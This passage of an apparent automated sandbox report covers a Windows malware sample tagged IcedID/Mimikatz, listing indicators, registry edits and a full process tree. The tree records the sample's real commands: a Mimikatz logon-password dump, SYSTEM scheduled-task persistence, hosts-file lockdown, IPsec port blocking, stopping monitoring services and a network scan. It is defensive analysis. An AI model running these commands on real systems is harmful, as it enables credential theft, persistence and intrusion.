\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iticjtthr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pgigett.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ascsso.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3364 cmd.exe 2756 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00070000000234ee-6.dat nsis_installer_2 behavioral2/files/0x0008000000023505-15.dat nsis_installer_1 behavioral2/files/0x0008000000023505-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" pgigett.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" pgigett.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing pgigett.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" pgigett.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pgigett.exe Key created \REGISTRY\USER\.DEFAULT\Software hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" pgigett.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hkttbitjb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hkttbitjb.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" pgigett.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2756 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 704 schtasks.exe 5080 schtasks.exe 3020 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3684 pgigett.exe Token: SeDebugPrivilege 4740 pgigett.exe Token: SeDebugPrivilege 332 vfshost.exe Token: SeDebugPrivilege 4532 hkttbitjb.exe Token: SeLockMemoryPrivilege 5072 pgtieb.exe Token: SeLockMemoryPrivilege 5072 pgtieb.exe Token: SeDebugPrivilege 1788 hkttbitjb.exe Token: SeDebugPrivilege 4340 hkttbitjb.exe Token: SeDebugPrivilege 3012 hkttbitjb.exe Token: SeDebugPrivilege 964 hkttbitjb.exe Token: SeDebugPrivilege 4784 hkttbitjb.exe Token: SeDebugPrivilege 780 hkttbitjb.exe Token: SeDebugPrivilege 1588 hkttbitjb.exe Token: SeDebugPrivilege 2384 hkttbitjb.exe Token: SeDebugPrivilege 2020 hkttbitjb.exe Token: SeDebugPrivilege 3520 hkttbitjb.exe Token: SeDebugPrivilege 1836 hkttbitjb.exe Token: SeDebugPrivilege 3412 hkttbitjb.exe Token: SeDebugPrivilege 1532 hkttbitjb.exe Token: SeDebugPrivilege 4780 hkttbitjb.exe Token: SeDebugPrivilege 2664 hkttbitjb.exe Token: SeDebugPrivilege 4264 hkttbitjb.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe 3684 pgigett.exe 3684 pgigett.exe 4740 pgigett.exe 4740 pgigett.exe 4452 xohudmc.exe 4272 ascsso.exe 2136 pgigett.exe 2136 pgigett.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3984 wrote to memory of 3364 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe 82 PID 3984 wrote to memory of 3364 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe 82 PID 3984 wrote to memory of 3364 3984 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe 82 PID 3364 wrote to memory of 2756 3364 cmd.exe 84 PID 3364 wrote to memory of 2756 3364 cmd.exe 84 PID 3364 wrote to memory of 2756 3364 cmd.exe 84 PID 3364 wrote to memory of 3684 3364 cmd.exe 85 PID 3364 wrote to memory of 3684 3364 cmd.exe 85 PID 3364 wrote to memory of 3684 3364 cmd.exe 85 PID 4740 wrote to memory of 4660 4740 pgigett.exe 87 PID 4740 wrote to memory of 4660 4740 pgigett.exe 87 PID 4740 wrote to memory of 4660 4740 pgigett.exe 87 PID 4660 wrote to memory of 1192 4660 cmd.exe 89 PID 4660 wrote to memory of 1192 4660 cmd.exe 89 PID 4660 wrote to memory of 1192 4660 cmd.exe 89 PID 4660 wrote to memory of 1060 4660 cmd.exe 90 PID 4660 wrote to memory of 1060 4660 cmd.exe 90 PID 4660 wrote to memory of 1060 4660 cmd.exe 90 PID 4660 wrote to memory of 3644 4660 cmd.exe 91 PID 4660 wrote to memory of 3644 4660 cmd.exe 91 PID 4660 wrote to memory of 3644 4660 cmd.exe 91 PID 4660 wrote to memory of 2616 4660 cmd.exe 92 PID 4660 wrote to memory of 2616 4660 cmd.exe 92 PID 4660 wrote to memory of 2616 4660 cmd.exe 92 PID 4660 wrote to memory of 1852 4660 cmd.exe 93 PID 4660 wrote to memory of 1852 4660 cmd.exe 93 PID 4660 wrote to memory of 1852 4660 cmd.exe 93 PID 4660 wrote to memory of 5084 4660 cmd.exe 94 PID 4660 wrote to memory of 5084 4660 cmd.exe 94 PID 4660 wrote to memory of 5084 4660 cmd.exe 94 PID 4740 wrote to memory of 3552 4740 pgigett.exe 102 PID 4740 wrote to memory of 3552 4740 pgigett.exe 102 PID 4740 wrote to memory of 3552 4740 pgigett.exe 102 PID 4740 wrote to memory of 1080 4740 pgigett.exe 104 PID 4740 wrote to memory of 1080 4740 pgigett.exe 104 PID 4740 wrote to memory of 1080 4740 pgigett.exe 104 PID 4740 wrote to memory of 2212 4740 pgigett.exe 106 PID 4740 wrote to memory of 2212 4740 pgigett.exe 106 PID 4740 wrote to memory of 2212 4740 pgigett.exe 106 PID 4740 wrote to memory of 1648 4740 pgigett.exe 110 PID 4740 wrote to memory of 1648 4740 pgigett.exe 110 PID 4740 wrote to memory of 1648 4740 pgigett.exe 110 PID 1648 wrote to memory of 4008 1648 cmd.exe 112 PID 1648 wrote to memory of 4008 1648 cmd.exe 112 PID 1648 wrote to memory of 4008 1648 cmd.exe 112 PID 4008 wrote to memory of 3248 4008 wpcap.exe 113 PID 4008 wrote to memory of 3248 4008 wpcap.exe 113 PID 4008 wrote to memory of 3248 4008 wpcap.exe 113 PID 3248 wrote to memory of 4896 3248 net.exe 115 PID 3248 wrote to memory of 4896 3248 net.exe 115 PID 3248 wrote to memory of 4896 3248 net.exe 115 PID 4008 wrote to memory of 1924 4008 wpcap.exe 116 PID 4008 wrote to memory of 1924 4008 wpcap.exe 116 PID 4008 wrote to memory of 1924 4008 wpcap.exe 116 PID 1924 wrote to memory of 2168 1924 net.exe 118 PID 1924 wrote to memory of 2168 1924 net.exe 118 PID 1924 wrote to memory of 2168 1924 net.exe 118 PID 4008 wrote to memory of 8 4008 wpcap.exe 119 PID 4008 wrote to memory of 8 4008 wpcap.exe 119 PID 4008 wrote to memory of 8 4008 wpcap.exe 119 PID 8 wrote to memory of 2784 8 net.exe 121 PID 8 wrote to memory of 2784 8 net.exe 121 PID 8 wrote to memory of 2784 8 net.exe 121 PID 4008 wrote to memory of 4972 4008 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1636
-
C:\Windows\TEMP\hugtqqyhl\pgtieb.exe"C:\Windows\TEMP\hugtqqyhl\pgtieb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\atrbieur\pgigett.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2756
-
-
C:\Windows\atrbieur\pgigett.exeC:\Windows\atrbieur\pgigett.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3684
-
-
-
C:\Windows\atrbieur\pgigett.exeC:\Windows\atrbieur\pgigett.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1192
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3644
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:5084
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3552
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1080
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\cerspitiz\mbirvrilt\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\cerspitiz\mbirvrilt\wpcap.exeC:\Windows\cerspitiz\mbirvrilt\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2784
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4972 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4108
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2992 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:916
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1436 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4944
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\cerspitiz\mbirvrilt\iticjtthr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cerspitiz\mbirvrilt\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1724 -
C:\Windows\cerspitiz\mbirvrilt\iticjtthr.exeC:\Windows\cerspitiz\mbirvrilt\iticjtthr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cerspitiz\mbirvrilt\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\cerspitiz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\cerspitiz\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1384 -
C:\Windows\cerspitiz\Corporate\vfshost.exeC:\Windows\cerspitiz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtrblbihr" /ru system /tr "cmd /c C:\Windows\ime\pgigett.exe"2⤵PID:4064
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtrblbihr" /ru system /tr "cmd /c C:\Windows\ime\pgigett.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ietkmstbz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\atrbieur\pgigett.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3160 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ietkmstbz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\atrbieur\pgigett.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qubtszpzf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hugtqqyhl\pgtieb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:696 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qubtszpzf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hugtqqyhl\pgtieb.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5080
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2220
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4400
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2612
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4828
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3676
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2664
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2544
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4320
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3496
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4856
-
-
